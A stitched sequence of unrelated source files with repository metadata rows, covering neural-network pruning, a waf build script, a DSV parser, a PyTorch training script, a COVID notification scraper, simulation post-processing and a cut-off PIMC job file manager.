pruning_pairs_dict_overall_scores[layer_idx][(node_a, node_b)] = curr_score
print(" [DEBUG]", utility.bcolors.OKGREEN, "Accepting (stochastic)", utility.bcolors.ENDC, (node_a, node_b), "despite the score",
round(curr_score, 6), "because the probability", round(prob_random, 6), "<=", round(prob_sim_annealing, 6))
else:
print(" [DEBUG]", utility.bcolors.FAIL, "Reject", utility.bcolors.ENDC, (node_a, node_b), "because the score",
round(curr_score, 6), ">", round(target_scores[layer_idx], 6), "and random prob. doesn't satisfy", round(prob_sim_annealing, 6))
# Drop that pair from the neurons_manipulated list and enable re-considering in future epoch
if node_b in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_b)
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
else:
# Drop that pair from the neurons_manipulated list and enable re-considering in future epoch
if node_b in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_b)
if node_a in neurons_manipulated[layer_idx]:
neurons_manipulated[layer_idx].remove(node_a)
if (count < num_candidates_to_gen):
print(" >> Insufficient number of pruning candidates, walk again ...")
# Here we evaluate the impact to the output layer
if cumul_impact_ints_curr_layer is None:
cumul_impact_ints_curr_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map, pruning_pairs_curr_layer_confirmed, layer_idx)
else:
cumul_impact_ints_curr_layer = ia.interval_list_add(cumul_impact_ints_curr_layer,
simprop.calculate_impact_of_pruning_next_layer(model, big_map,
pruning_pairs_curr_layer_confirmed,
layer_idx,
kaggle_credit=kaggle_credit))
if cumulative_impact_intervals is None:
cumulative_impact_intervals = simprop.calculate_bounds_of_output(model, cumul_impact_ints_curr_layer, layer_idx+1)
else:
cumulative_impact_intervals= ia.interval_list_add(cumulative_impact_intervals,
simprop.calculate_bounds_of_output(model,
cumul_impact_ints_curr_layer,
layer_idx+1))
# print(" >> DEBUG: len(cumulative_impact_curr_layer_pruning_to_next_layer):", len(cumul_impact_ints_curr_layer))
# print(" >> DEBUG: len(cumulative_impact_to_output_layer):", len(cumulative_impact_intervals))
# Now let's do pruning (simulated, by zeroing out weights but keeping neurons in the network)
for (node_a, node_b) in pruning_pairs_curr_layer_confirmed:
# Change all weight connecting from node_b to the next layers as the sum of node_a and node_b's ones
# & Reset all weight connecting from node_a to ZEROs
# RECALL: next_weights_neuron_as_rows = w[layer_idx+1][0] ([0] for weight and [1] for bias)
for i in range(0, num_next_neurons):
w[layer_idx + 1][0][node_a][i] = w[layer_idx + 1][0][node_b][i] + w[layer_idx + 1][0][node_a][i]
w[layer_idx + 1][0][node_b][i] = 0
total_pruned_count += 1
# Save the modified parameters to the model
model.layers[layer_idx + 1].set_weights(w[layer_idx + 1])
pruned_pairs[layer_idx].extend(pruning_pairs_curr_layer_confirmed)
# TEMP IMPLEMENTATION STARTS HERE
if not kaggle_credit:
big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(0, 1))
else:
big_map = simprop.get_definition_map(model, definition_dict=big_map, input_interval=(-5, 5))
print("Pruning layer #", layer_idx, "completed, updating definition hash map...")
# TEMP IMPLEMENTATION ENDS HERE
layer_idx += 1
print(" >> DEBUG: size of cumulative impact total", len(cumulative_impact_intervals))
print("Pruning accomplished -", total_pruned_count, "units have been pruned")
return model, neurons_manipulated, target_scores, pruned_pairs, cumulative_impact_intervals, pruning_pairs_dict_overall_scores
| [
"huasong.meng@gmail.com"
] | huasong.meng@gmail.com |
95cd4d519c8b65d09a90e0a1a1ab1db1c5e65090 | b677894966f2ae2d0585a31f163a362e41a3eae0 | /ns3/pybindgen-0.17.0.post57+nga6376f2/tests/boost/wscript | 575c486512db2596263726622d81756947c7266d | [
"LGPL-2.1-only",
"Apache-2.0"
] | permissive | cyliustack/clusim | 667a9eef2e1ea8dad1511fd405f3191d150a04a8 | cbedcf671ba19fded26e4776c0e068f81f068dfd | refs/heads/master | 2022-10-06T20:14:43.052930 | 2022-10-01T19:42:19 | 2022-10-01T19:42:19 | 99,692,344 | 7 | 3 | Apache-2.0 | 2018-07-04T10:09:24 | 2017-08-08T12:51:33 | Python | UTF-8 | Python | false | false | 1,018 | ## -*- python -*-
#from waflib import Task
import sys
import os.path
import os
import subprocess
# uncomment to enable profiling information
# epydoc uses the profile data to generate call graphs
#os.environ["PYBINDGEN_ENABLE_PROFILING"] = ""
# Interpreter flag handed to the binding-generator command below: flip the
# `if 0` to make DeprecationWarnings fatal while generating the bindings.
if 0:
    DEPRECATION_ERRORS = '-Werror::DeprecationWarning' # deprecations become errors
else:
    DEPRECATION_ERRORS = '-Wdefault::DeprecationWarning' # normal python behaviour
def build(bld):
    """Waf build rule: generate the pybindgen binding source, then (when a C++
    toolchain and boost::shared_ptr support are configured) compile it into
    the `bar` Python extension module."""
    build_env = bld.env
    # The generator script receives the source-tree root on its command line.
    build_env['TOP_SRCDIR'] = bld.srcnode.abspath()
    # Step 1: run barmodulegen.py to emit the C++ binding code.
    bindgen = bld(features='command',
                  source='barmodulegen.py',
                  target='barmodule.cc',
                  command='${PYTHON} %s ${SRC[0]} ${TOP_SRCDIR} > ${TGT[0]}' % (DEPRECATION_ERRORS,))
    # Step 2: build the shared-library Python extension.
    if build_env['CXX'] and build_env['ENABLE_BOOST_SHARED_PTR'] == True:
        ext = bld(features='cxx cxxshlib pyext')
        ext.source = ['bar.cc', 'barmodule.cc']
        ext.target = 'bar'
        ext.install_path = None
        ext.env.append_value("INCLUDES", '.')
| [
"you@example.com"
] | you@example.com | |
f46767f0cb57c7bfcc381cb179d5a5d2687ff68b | f1bcf67d0d2f50abece18f388d8fb133b6fc5ef1 | /hello.py | bdf7c0a0359af0a7261cc010df198d5af3242728 | [] | no_license | Tochit/repo | e369e4bc16cc76cff549df5010e934f40292c9f2 | a29cc4e83e55dc27f7e4274bd21c597bda75f7c8 | refs/heads/master | 2020-03-27T08:27:40.601692 | 2018-08-27T06:42:47 | 2018-08-27T06:42:47 | 146,256,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | # This is my start back into the real world!
# Simple smoke-test script: print a greeting to the console.
print("Hello everyone, excited to be here with you all!")
| [
"42474056+Tochit@users.noreply.github.com"
] | 42474056+Tochit@users.noreply.github.com |
1a23264abf173dd6e2f451aa249496654ac13ced | 3c5c707ed1577c7af5125824d8d349c2a48f65a4 | /dsv.py | 4102eacd1913297bfa1e23b4c5ecd743bf20eeb3 | [
"BSD-2-Clause"
] | permissive | mrozo/hut | e56b3495f27f6e4fe97f59df13dc01dbd19e9dc0 | 0293d54cf6ccab4f92c968db3a2e46bed0f90172 | refs/heads/master | 2023-05-26T07:50:40.456099 | 2021-06-12T00:24:24 | 2021-06-12T00:24:24 | 332,919,574 | 1 | 0 | BSD-2-Clause | 2021-03-26T23:30:32 | 2021-01-26T00:03:31 | Python | UTF-8 | Python | false | false | 1,579 | py | from typing import List, Iterable
def dsv_escape(string, delimiter=';'):
    """Escape *string* for DSV output: backslashes, newlines and the
    delimiter each get a leading backslash.

    Fix: the previous `f'\\{delimiter}'` relied on the invalid escape
    sequence `\\{` inside an f-string literal (a SyntaxWarning on modern
    Python); plain concatenation produces the same text unambiguously.
    """
    return (str(string)
            .replace('\\', '\\\\')
            .replace('\n', '\\n')
            .replace(delimiter, '\\' + delimiter))
def dsv_record_dump(elements, delimiter=';'):
    """Serialize one record: escape each element, then join with *delimiter*.

    Fix: `map(dsv_escape, elements)` always escaped the *default* ';' even
    when a custom delimiter was requested, so values containing that custom
    delimiter were emitted unescaped and could not be parsed back. The escape
    step now receives the same delimiter used for joining.
    """
    return delimiter.join(dsv_escape(element, delimiter) for element in elements)
def dsv_value_load(line, delimiter=';'):
    """Parse one escaped DSV value from the start of *line*.

    Returns a tuple ``(value, consumed)`` where *consumed* is the number of
    characters read, including the terminating delimiter when present.
    Backslash escapes of a/b/f/n/r/t/v map to their control characters; any
    other escaped character is taken literally.
    """
    unescape = {
        'a': '\a',
        'b': '\b',
        'f': '\f',
        'n': '\n',
        'r': '\r',
        't': '\t',
        'v': '\v'
    }
    chars = []
    position = 0
    pending_escape = False
    while position < len(line):
        current = line[position]
        position += 1
        if pending_escape:
            chars.append(unescape.get(current, current))
            pending_escape = False
        elif current == '\\':
            pending_escape = True
        elif current == delimiter:
            # Delimiter consumed but not part of the value.
            break
        else:
            chars.append(current)
    return ''.join(chars), position
def dsv_record_load(line, delimiter=';'):
    """Parse one (possibly newline-terminated) DSV line into a list of
    unescaped values."""
    line = line.strip()
    values = []
    position = 0
    while position < len(line):
        value, consumed = dsv_value_load(line[position:], delimiter)
        position += consumed
        values.append(value)
    return values
def dsv_reader(data_source: Iterable[str], delimiter=';') -> Iterable[List[str]]:
    """Lazily parse each line of *data_source* into a record (list of values)."""
    for line in data_source:
        yield dsv_record_load(line, delimiter)
def interleave_list_with_element(the_list: Iterable, element):
    """Yield every item of *the_list*, each one followed by *element*
    (used to append a separator after every record)."""
    for item in the_list:
        yield from (item, element)
def dsv_generator(data_source: Iterable, method='as_dsv'):
    """Yield each record's DSV serialization (obtained by calling *method*
    on the record) followed by a newline separator."""
    for record in data_source:
        yield getattr(record, method)()
        yield "\n"
| [
"private@mrozo.pl"
] | private@mrozo.pl |
57603327b9887f32d8203a36ccf6526fb96c1757 | fee972575370e9c3892e4563246d7e872202216a | /src/torch_model.py | e413038ca8077c4c2722f679370f8574b4cd3cdf | [] | no_license | jsw95/accounts-checker-ai | 94a4b0e80e33ae8c5ea5a36c3f4e54397e93742d | ebea2be216554fba7c60052b44bdc85e5afc2246 | refs/heads/master | 2021-06-30T04:56:08.203955 | 2020-10-28T10:25:20 | 2020-10-28T10:25:20 | 182,429,480 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,491 | py | import os
import re
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from skimage import io
import pathlib
from src.data_processing import generate_char_dict
from src.data_processing import resize_img, binary_threshold, transform_image_for_training
# Root folder of the raw account images (not referenced below; kept for reference).
base_data_path = "/home/jack/Workspace/data/accounts/images/"

print(f"GPU available: {torch.cuda.is_available()}")
# Use the first CUDA device when present, otherwise fall back to the CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Net(nn.Module):
    """LeNet-style CNN classifying single-channel images into 58 classes.

    The flatten size 13456 = 16 * 29 * 29 implies a 128x128 input after the
    two conv(5)/pool(2) stages.
    """

    def __init__(self):
        super(Net, self).__init__()
        self.conv1 = nn.Conv2d(1, 6, 5)
        self.pool = nn.MaxPool2d(2, 2)
        self.conv2 = nn.Conv2d(6, 16, 5)
        self.fc1 = nn.Linear(13456, 120)
        self.fc2 = nn.Linear(120, 76)
        self.fc3 = nn.Linear(76, 58)  # num chars

    def forward(self, x):
        features = self.pool(F.relu(self.conv1(x)))
        features = self.pool(F.relu(self.conv2(features)))
        flat = features.view(-1, 13456)
        hidden = F.relu(self.fc1(flat))
        hidden = F.relu(self.fc2(hidden))
        return self.fc3(hidden)
def train():
    """Train the module-level `net` for 10 epochs on the (imgs, labs) pairs.

    Relies on globals created in the __main__ block: `net`, `imgs`, `labs`,
    `optimizer`, `criterion` and `device`. Saves the final weights to
    ../models/first_.sav relative to this file.
    """
    print("Training")
    epoch_loss = 0
    for epoch in range(10):
        # Prints the accumulated loss of the *previous* epoch (0 on first pass).
        print(epoch_loss)
        epoch_loss = 0
        # for i, data in enumerate(trainloader, 0):
        for inputs, label in zip(imgs, labs):
            # CrossEntropyLoss expects integer class indices (int64 tensor).
            label = torch.Tensor([int(label)]).to(torch.int64)
            inputs, label = inputs.to(device), label.to(device)
            optimizer.zero_grad()
            output = net(inputs)
            loss = criterion(output, label)
            loss.backward()
            optimizer.step()
            epoch_loss += float(loss)
    torch.save(net.state_dict(), f'{pathlib.Path(__file__).parent.parent}/models/first_.sav')
if __name__ == '__main__':
    net = Net()
    net.to(device)
    # Character/index mapping; printed for reference only.
    char_dict = generate_char_dict()
    print(char_dict)
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)
    # Build the training set from a slice of the image folder; the label is
    # parsed out of each file name (imgNNN...).
    imgs, labs = [], []
    for file in os.listdir("/home/jack/Workspace/data/accounts/English/Img/allImgs")[50:200]:
        if file.endswith('.png'):
            lab = re.match(r'img([0-9]+)', file).group(1)
            img = io.imread(f"/home/jack/Workspace/data/accounts/English/Img/allImgs/{file}", as_grey=True)
            img = transform_image_for_training(img)
            # Add batch and channel dimensions: (1, 1, H, W).
            img = torch.from_numpy(img).unsqueeze(0).unsqueeze(0).to(torch.float32)
            imgs.append(img)
            labs.append(lab)
    train()
| [
"wells.jack@hotmail.co.uk"
] | wells.jack@hotmail.co.uk |
e914a333d58ef80b35b7481bd60714074e533942 | 62fc36b3244037355ac18749c200492a39b793a0 | /Week5/Predict.py | f48d3d739420d8f3baab1a641bfa70320367edde | [] | no_license | charleseagle/Machine-Learning-Coursera-Python | 0afc994e09fc2b609327e9899c859daa457724bb | b85f18104d4ad14b7b90c96272adf6c85a2a53c2 | refs/heads/master | 2021-01-14T13:44:13.533910 | 2015-10-25T23:08:48 | 2015-10-25T23:08:48 | 44,615,834 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | from __future__ import division
import numpy as np
import Sigmoid
def Predict(theta1, theta2, X):
    """Forward-propagate X through a two-layer network and predict labels.

    Parameters
    ----------
    theta1, theta2 : weight matrices of the hidden and output layers
        (each includes a bias column).
    X : (m, n) input matrix, one example per row.

    Returns
    -------
    (m, 1) array of 1-based predicted class labels.
    """
    m = np.shape(X)[0]
    p = np.zeros((m, 1))
    # Hidden layer: prepend the bias column, then apply the sigmoid.
    h1 = Sigmoid.Sigmoid(np.append(np.ones((m, 1)), X, 1).dot(theta1.T))
    # Output layer activations, one row of class scores per example.
    h2 = Sigmoid.Sigmoid(np.append(np.ones((m, 1)), h1, 1).dot(theta2.T))
    for i in range(np.shape(h2)[0]):
        # BUG FIX: take the argmax of row i only. The previous
        # np.where(h2 == h2[i,:].max())[1] scanned the whole matrix and broke
        # whenever the row maximum also occurred in another row.
        p[i] = np.argmax(h2[i, :])
    return p + 1
"sunqicharles@gmail.com"
] | sunqicharles@gmail.com |
f60819f9f80dbc0c89af1fe4036d18f232f00e97 | 4cc0be2edb699b77cf7f092454275af2cca61c6f | /corona.py | 7741106cc2352a12d2d56b2a3e50e8792fdec6c1 | [] | no_license | miglaniparth/CoronaVirusNotification | a9add03e4334e582534813531276a9a54cf13e28 | 4fd5025b341d7bb93bb46b80210eb41c358e80c7 | refs/heads/master | 2023-04-21T22:39:18.243151 | 2021-04-14T06:58:54 | 2021-04-14T06:58:54 | 275,451,040 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | from plyer import notification
import requests
from bs4 import BeautifulSoup
import time
def notifyMe(title, message):
    """Show a desktop toast notification (via plyer) for 6 seconds."""
    notification.notify(title=title,
                        message=message,
                        app_icon="icon.ico",
                        timeout=6)
def getData(url):
    """Fetch *url* over HTTP and return the response body as text."""
    response = requests.get(url)
    return response.text
# Entry point: poll the Ministry of Health website once per hour and raise a
# desktop notification for each state of interest.
# BUG FIX: the guard previously read `if _name_ == "_main_":` which raises
# NameError at runtime; the correct dunder names are __name__ / __main__.
if __name__ == "__main__":
    while True:
        # notifyMe("Harry", "Lets stop the spread of this virus together")
        myHtmlData = getData('https://www.mohfw.gov.in/')
        soup = BeautifulSoup(myHtmlData, 'html.parser')
        # print(soup.prettify())
        # Flatten the second <tbody> (presumably the state-wise table) to text.
        myDataStr = ""
        for tr in soup.find_all('tbody')[1].find_all('tr'):
            myDataStr += tr.get_text()
        myDataStr = myDataStr[1:]
        itemList = myDataStr.split("\n\n")
        # Only these states trigger a notification.
        states = ['Chandigarh', 'Telengana', 'Uttar Pradesh']
        for item in itemList[0:22]:
            dataList = item.split('\n')
            if dataList[1] in states:
                nTitle = 'Cases of Covid-19'
                nText = f"State {dataList[1]}\nIndian : {dataList[2]} & Foreign : {dataList[3]}\nCured : {dataList[4]}\nDeaths : {dataList[5]}"
                notifyMe(nTitle, nText)
                time.sleep(2)
        time.sleep(3600)
| [
"noreply@github.com"
] | miglaniparth.noreply@github.com |
c911f4f6bb37290fb1349c27b7005f20efd9f809 | bafbbf964c45c4cbed2e3c4bcfd94fa28c567928 | /f3dasm/post_processing.py | 4dbb8a8ebce41cb3e23370485e102ed03b54d177 | [
"BSD-3-Clause"
] | permissive | niketagrawal/F3DASM | 2b5a4774a59a8aa917519aa2cb366498e34b3e65 | 768acf1f8407e28cdb93dfe53a2fd0dd92947a6d | refs/heads/master | 2023-08-24T20:40:23.447354 | 2020-11-09T00:28:42 | 2020-11-09T00:28:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,465 | py | '''
Created on 2020-05-05 16:28:59
Last modified on 2020-09-30 11:42:01
@author: L. F. Pereira (lfpereira@fe.up.pt)
'''
# imports
# standard library
import os
import pickle
import gzip
import shutil
# third-party
import pandas as pd
# local library
from .utils.file_handling import get_unique_file_by_ext
from .utils.file_handling import collect_folder_names
from .utils.utils import get_int_number_from_str
from .utils.utils import read_pkl_file
# TODO: possibility of entering abaqus for post-processing
# function definition
def post_process_sims(pp_fnc, example_name, sim_numbers=None,
                      sims_dir_name='analyses', data_filename='DoE.pkl',
                      data=None, raw_data='raw_data.pkl', create_new_file='',
                      pp_fnc_kwargs=None):
    '''
    Apply `pp_fnc` to each simulation's raw data and store the resulting
    output variables in the DoE `points` table.

    Parameters
    ----------
    pp_fnc : callable
        Receives one simulation's raw data (plus `pp_fnc_kwargs`) and returns
        a dict mapping output-variable names to values.
    create_new_file : str
        If not empty, then a new file is created containing the information
        in `data_filename` plus the treated outputs.
    data_filename : str
        If `data` is given and `data_filename` is empty, then an updated file
        will not be stored.
    data : dict
        If given, `data_filename` will be ignored during data reading.
    raw_data : pd.Series or str or None.
        Data is gathered according to `raw_data` type. The possibilities are:
            None: simulation folders
            str: raw data file
            pandas.Series: uses itself.

    Notes
    -----
    1. If the output variables already exist in 'points', their values are
    updated only if the post-processing data for the given point is available
    in `sims_dir_name`. Otherwise, older values are kept.
    '''
    # initialization
    pp_fnc_kwargs = {} if pp_fnc_kwargs is None else pp_fnc_kwargs

    # get current pandas
    if data is None:
        # BUG FIX: previously opened `data` (which is None in this branch);
        # the file to read is `data_filename`.
        with open(os.path.join(example_name, data_filename), 'rb') as file:
            data = pickle.load(file)
    points = data['points']

    # get available simulations
    if type(raw_data) is str or raw_data is None:
        raw_data = collect_raw_data(example_name, sims_dir_name=sims_dir_name,
                                    sim_numbers=sim_numbers, delete=False,
                                    raw_data_filename=raw_data)

    # add outputs to pd.Dataframe (also post-processes 1st simulation)
    column_names = list(points.columns.values)
    sim_numbers = list(raw_data.keys()) if sim_numbers is None else list(sim_numbers)
    sim_number = sim_numbers.pop(0)
    data_sim = raw_data.loc[sim_number]
    results_sim = pp_fnc(data_sim, **pp_fnc_kwargs)
    output_variables = list(results_sim.keys())
    # Append any new output columns (reversed so insertion order is preserved).
    for variable in output_variables[::-1]:
        if variable not in column_names:
            points.insert(loc=len(column_names), value=None, column=variable)
    for key, value in results_sim.items():
        points.loc[sim_number, key] = value

    # get results for each remaining simulation
    # `.items()` replaces `.iteritems()`, which was removed in pandas 2.0.
    for sim_number, data_sim in raw_data.loc[sim_numbers].items():
        results_sim = pp_fnc(data_sim, **pp_fnc_kwargs)
        for key, value in results_sim.items():
            points.loc[sim_number, key] = value

    # create new pickle file (skipped when the resulting name is empty)
    data_filename_output = create_new_file if create_new_file else data_filename
    if data_filename_output:
        with open(os.path.join(example_name, data_filename_output), 'wb') as file:
            pickle.dump(data, file)

    return data
def get_sim_data(dir_name, folder_name):
    """Load the single pickled results file found inside one simulation folder."""
    # TODO: add possibility of using gzip
    sim_dir = os.path.join(dir_name, folder_name)
    pkl_name = get_unique_file_by_ext(sim_dir, ext='.pkl')
    with open(os.path.join(sim_dir, pkl_name), 'rb') as file:
        return pickle.load(file, encoding='latin1')
def concatenate_raw_data(example_name, data_filename='DoE.pkl',
                         raw_data_filename='raw_data.pkl', sims_dir_name='analyses',
                         delete=False, compress=True, sim_numbers=None):
    '''
    Creates an unique file that contains all the information of the problem.

    Parameters
    ----------
    compress : bool
        If True, zips file using gzip. It may take longer. Depending on the data,
        the compression ratio may be huge.

    Notes
    -----
    1. If file already exists, then data in 'analyses' is added to the
    already existing information (overriding pre-existing information).
    '''
    # Pick the opener once: gzip compression is optional.
    open_file = gzip.open if compress else open

    # Start from the previously stored series, when one exists.
    raw_data_path = os.path.join(example_name, raw_data_filename)
    if os.path.exists(raw_data_path):
        raw_data = read_pkl_file(raw_data_path)
    else:
        raw_data = pd.Series(dtype=object)

    # Newly collected simulations take precedence over pre-existing entries.
    new_raw_data = collect_raw_data_from_folders(example_name,
                                                 sims_dir_name=sims_dir_name,
                                                 sim_numbers=sim_numbers, delete=delete)
    raw_data = new_raw_data.combine_first(raw_data).sort_index()

    # Persist the merged series.
    with open_file(raw_data_path, 'wb') as file:
        pickle.dump(raw_data, file)

    return raw_data
def collect_raw_data(example_name, sims_dir_name='analyses', sim_numbers=None,
                     delete=False, raw_data_filename='raw_data.pkl'):
    """Fetch raw simulation data either from the concatenated pickle file
    (when a file name is given) or by walking the simulation folders."""
    if not raw_data_filename:
        return collect_raw_data_from_folders(
            example_name, sims_dir_name=sims_dir_name,
            sim_numbers=sim_numbers, delete=False)
    raw_data = read_pkl_file(os.path.join(example_name, raw_data_filename))
    if sim_numbers is not None:
        raw_data = raw_data.loc[sim_numbers]
    return raw_data
def collect_raw_data_from_folders(example_name, sims_dir_name='analyses',
                                  sim_numbers=None, delete=False):
    """Gather each available simulation's pickled data, keyed by the
    simulation number parsed from its folder name."""
    sims_dir = os.path.join(example_name, sims_dir_name)
    folder_names = collect_folder_names(sims_dir, sim_numbers=sim_numbers)
    raw_data = {}
    for folder_name in folder_names:
        sim_number = get_int_number_from_str(folder_name)
        raw_data[sim_number] = get_sim_data(sims_dir, folder_name)
        if delete:
            # The folder is no longer needed once its data has been captured.
            shutil.rmtree(os.path.join(sims_dir, folder_name))
    return pd.Series(raw_data)
| [
"lfpereira@fe.up.pt"
] | lfpereira@fe.up.pt |
2aea9148c27a7fbf9f644d8c40edb2525fad701b | dd483c380c93edb21dae4cb0cb082ba0bfeb3e6a | /app/src/apps/stats/topological_stat/views.py | 7c0caf2793ef1aa6e631cff093ebcec9992ed96e | [] | no_license | BarbaraDiazE/D_Peptide_Builder | 7aa4647c9b0ce20d8a258834d0dffaf21e368224 | d47e29e0b9e55bd6e520bc9caf7d362e796d458d | refs/heads/master | 2020-04-25T02:29:03.092694 | 2019-02-25T20:43:19 | 2019-02-25T20:43:19 | 172,440,859 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 546 | py | from rest_framework.views import APIView
from django.http import HttpResponse
from django.shortcuts import render, render_to_response
import pandas as pd
import os
import glob
from .compute_topological import statTOPOLOGICAL
class TOPOLOGICALView(APIView):
    """Render the topological-descriptor statistics page for the CSV stored
    in the current session."""

    def get(self, request):
        dataset_name = request.session['csv_name']
        stats_html = statTOPOLOGICAL(dataset_name).resolve()
        return render(request, 'stats_topological.html',
                      {'loaded_data': stats_html})
"debi_1223@hotmail.com"
] | debi_1223@hotmail.com |
cb5c24b4ef410ce18ba99f9a7dfde0edd77054ea | ccb5bc03e4d4a63efe9451016dc2107826077f55 | /main.py | da1eb3f329f99adcf99492c4dea844620f6f5558 | [] | no_license | happyperson10/hill-climb-racing | f7533a1580be282faac9069f26c61319e7c9a88c | 48f85cbbe47ec97b456f6299410c06bac44e9978 | refs/heads/master | 2022-11-10T17:10:44.287859 | 2020-07-02T15:08:49 | 2020-07-02T15:08:49 | 276,645,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | import pygame
# --- Initialisation -------------------------------------------------------
pygame.init()
# --- Window configuration -------------------------------------------------
width = 800
height = 600
# Create the main window and set its title bar text.
window = pygame.display.set_mode((width,height))
pygame.display.set_caption("pygame")
# --- Event loop: keep the window open until the user closes it ------------
running = True
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
| [
"noreply@github.com"
] | happyperson10.noreply@github.com |
667fdd75326c1bad1cc0510e96ba34551f7e1f78 | b314d2efe8d8e0e12a8cce68bfed6bdc1357a7aa | /jobs/JobPIMCs.py | bd12b2ddeb6c840aaa8cbbefefe7d89cf3169f4c | [] | no_license | BohdanKul/Scripts | 1caf3090d619c433527b70db89f5db4d4e013bf6 | 20a97f3b0def49ba51151581228c105c9449bbba | refs/heads/master | 2021-01-19T06:49:55.062103 | 2017-11-01T13:10:27 | 2017-11-01T13:10:27 | 22,358,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,388 | py | import sys,os,shutil
from optparse import OptionParser
def GetPIMCs(fileName):
    '''Creates a list of PIMC ids from a job output file generated on a cluster.

    Returns 0 (not an empty list) when the file cannot be read, because the
    caller distinguishes "unreadable file" from "no measurements" with
    `temp == 0`.
    '''
    # Fix: the file handle was never closed (`inFile.close` without the call
    # parentheses); a with-statement guarantees the close.
    try:
        with open(fileName, 'r') as inFile:
            inLines = inFile.readlines()
    except (IOError, OSError):
        return 0
    PIMCs = []
    # Dead `Mstate` toggling and the commented-out 'Legs' scan were removed:
    # the flag was unconditionally True before the loop.
    for line in inLines:
        if line.find('Measurement taken') != -1:
            # The pimc id is the first 9 characters of the measurement line;
            # only the first match is kept (matches the original behaviour).
            PIMCs.append(line[:9])
            break
    return PIMCs
def GetUnique(PIMCs):
    '''Returns unique entries in PIMCs list, preserving first-seen order.

    Fix: the previous version seeded the result with `PIMCs[0]` and raised
    IndexError on an empty list; an empty input now yields an empty list.
    '''
    unique = []
    for pimcid in PIMCs:
        if pimcid not in unique:
            unique.append(pimcid)
    return unique
def DetectDiff(inList, lookFor):
    '''Detects which elements of lookFor are not contained (as substrings)
    in any entry of inList; returns their indexes within lookFor.'''
    absent = []
    for index, pimcid in enumerate(lookFor):
        if not any(pimcid in entry for entry in inList):
            absent.append(index)
    return absent
def CopyDataFiles(BaseDir, newfolderName, PIMCs, fileList):
    '''Copy every file in fileList whose name contains one of the pimcids
    from BaseDir into newfolderName.'''
    for pimcid in PIMCs:
        matching = [name for name in fileList if pimcid in name]
        for name in matching:
            shutil.copyfile(BaseDir + name, newfolderName + name)
def MoveDataFiles(BaseDir, newfolderName, PIMCs, fileList):
    '''Move every file in fileList whose name contains one of the pimcids
    from BaseDir into newfolderName.'''
    for pimcid in PIMCs:
        matching = [name for name in fileList if pimcid in name]
        for name in matching:
            shutil.move(BaseDir + name, newfolderName + name)
def DeleteDataFiles(BaseDir, PIMCs, fileList):
    '''Delete every file in fileList whose name contains one of the pimcids.'''
    for pimcid in PIMCs:
        matching = [name for name in fileList if pimcid in name]
        for name in matching:
            os.remove(BaseDir + name)
def main():
parser = OptionParser()
parser.add_option("-r", "--run", help="run number")
parser.add_option("-m", action="store_true", dest="move", default=False,\
help="Check to move pimc data files to the 'run-${run}' folder")
parser.add_option("-d", action="store_true", dest="delete", default=False,\
help="Check to delete pimc data files")
parser.add_option("-c", action="store_true", dest="copy", default=False,\
help="Check to copy pimc data files to the 'run-${run}' folder")
parser.add_option("-a", action="store_true", dest="archive", default=False,\
help="Check to archive pimc data files to the archive folder")
parser.add_option("--out", dest = 'outDir',\
help="Folder containing pimc redirected output files. Default = ''", default = './')
parser.add_option("--OUTPUT", dest = 'OUTPUTDir',\
help="Folder containing pimc data files. Default = '../OUTPUT/'", default = '../OUTPUT/')
(options, args) = parser.parse_args()
options.outDir = options.outDir.rstrip('/')+'/'
options.OUTPUTDir = options.OUTPUTDir.rstrip('/')+'/'
if options.run == None:
parser.error("Must specify flag -r to determine relevant output files to proceed")
if options.delete and options.copy:
parser.error("Cant delete and copy at the same time")
if options.move and options.copy:
parser.error("Cand move and copy at the same time")
#---------------------------------------------------------------------------------------------#
#---------------Get unique pimcids from the redirected output files---------------------------#
#---------------------------------------------------------------------------------------------#
fileList = os.listdir(options.outDir)
PIMCs = []
outputFiles = []
for files in fileList:
if files.find(options.run) != -1:
outputFiles.append(files)
temp = GetPIMCs(options.outDir+files)
if temp == 0:
print '%s contains no measurements' %options.outDir+files
else:
PIMCs.extend(temp)
print PIMCs
if len(outputFiles) == 0:
print 'No redirected output files for the run %s detected' %options.run
sys.exit()
if len(PIMCs) == 0:
print 'No measurements for the run %s detected' %options.run
sys.exit()
#Store unique pimcids
PIMCs = GetUnique(PIMCs)
#Keep an extra copy for the Cylinder folder
cPIMCs = PIMCs[:]
#---------------------------------------------------------------------------------------------#
#-----------------------------------------Normal output---------------------------------------#
#---------------------------------------------------------------------------------------------#
fileList = os.listdir(options.OUTPUTDir)
delpimcid = DetectDiff(fileList, PIMCs)
for n in reversed(delpimcid):
print('%s doesnt longer exist') %PIMCs[n]
PIMCs.pop(n)
if len(PIMCs) == 0:
print 'None of the files cant be found'
sys.exit()
#-------------------------- archive data-files-----------------------
if (options.archive):
#Create an archive folder
if not(os.path.exists(options.OUTPUTDir+'archive/')):
os.makedirs(options.OUTPUTDir+'archive/')
for pimcid in PIMCs:
for fileName in fileList:
if fileName.find(pimcid) != -1:
shutil.copyfile(options.OUTPUTDir+fileName, options.OUTPUTDir+'archive/'+fileName)
#----------------------------------------------------------------------
#Create an output folder
if options.copy or options.move:
folderName = options.OUTPUTDir+'run-'+options.run+'/'
if os.path.exists(folderName):
print("Folder %s already exists" %(folderName))
sys.exit()
else:
os.makedirs(folderName)
for outFile in outputFiles:
shutil.copyfile(options.outDir+outFile,folderName+outFile)
#-------------------------- Copy data-files----------------------------
if (options.copy):
